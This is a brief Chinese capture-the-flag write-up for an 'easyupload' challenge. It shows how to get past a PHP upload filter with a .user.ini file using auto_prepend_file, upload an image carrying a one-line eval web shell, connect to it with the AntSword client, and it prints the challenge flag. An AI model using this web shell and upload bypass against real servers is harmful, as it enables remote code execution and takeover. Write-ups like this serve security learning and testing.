根据题目easyupload知道该题是一个文件上传漏洞,先上传一张正确的图片,看看服务器回显
访问一下uploads,发现无法访问
上传一个PHP文件,发现上传失败。
由此可见前端会拒绝.php文件,再试一试php,phtml.php3,都不行。既然.php相关文件上传不了,那么就使用.user.ini文件构成PHP后门。
.user.ini文件内容
GIF89a
auto_prepend_file=a.jpg
上传成功
在上传一张包含PHP内容的图片
a.jpg
<?php eval($_POST['a']); ?>
接下来用中国蚁剑去连接一下
否则会一直连不上。
得到flag:cyberpeace{53323ec74855788f46d49ae43f72eff3}